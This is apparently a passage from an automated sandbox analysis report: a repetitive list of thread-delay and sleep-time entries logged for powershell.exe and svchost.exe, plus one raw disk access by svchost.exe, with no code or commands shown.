                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587020
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6223Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3582Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9041Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 406Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8035Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1633Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7052
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2581
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 911
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7523
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1904
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7648
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7707
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2504Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408Thread sleep count: 9041 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep count: 406 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep count: 8035 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep count: 40 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -591126s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712Thread sleep count: 1633 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590924s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590770s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590645s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590360s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590250s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590125s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -590016s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589903s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589797s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589682s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589576s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589468s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589361s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589234s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589120s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -589015s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588891s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588781s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588672s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588548s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588422s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588312s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588203s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -588094s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587984s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587875s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587756s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587599s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587464s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587279s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587151s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -587030s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520Thread sleep count: 7052 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep count: 34 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520Thread sleep count: 2581 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590938s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590770s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590610s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590360s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590235s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -590110s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589983s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589875s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589757s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589641s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589515s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589404s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589293s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589184s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -589077s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588969s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588859s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588749s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588639s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588531s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588413s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588297s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588188s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -588063s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587938s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587813s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587688s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587551s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587405s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587279s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587151s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756Thread sleep time: -587030s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528Thread sleep count: 8770 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep count: 38 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -35048813740048126s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep count: 911 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -591125s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590923s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590770s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590609s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590360s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590248s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590125s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -590015s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589905s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589797s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589677s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589552s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589420s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589310s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589203s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -589077s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588968s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588859s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588749s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588639s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588531s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588413s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588312s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588203s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -588094s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587984s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587875s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587756s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587598s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587464s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587279s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587151s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -587020s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 7523 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 1904 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9268Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9524Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 7648 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9260Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 1816 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9464Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 7707 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9252Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 1816 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9484Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591126Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590924Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590645Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590250Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590125Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590016Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589903Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589797Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589682Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589576Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589468Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589361Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589234Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589120Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589015Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588891Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588781Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588672Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588548Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588422Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588312Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588203Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588094Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587984Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587875Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587756Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587599Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587464Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587030Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590610
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590235
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590110
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589983
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589875
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589757
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589641
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589515
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589404
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589293
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589184
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589077
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588969
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588859
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588749
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588531
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588413
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588297
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588188
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588063
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587938
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587813
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587688
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587551
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587405
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587030
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591125
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590923
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590609
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590248
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590125
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590015
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589905
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589797
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589677
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589552
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589420
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589310
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589203
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589077
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588968
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588859
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588749
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588531
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588413
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588312
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588203
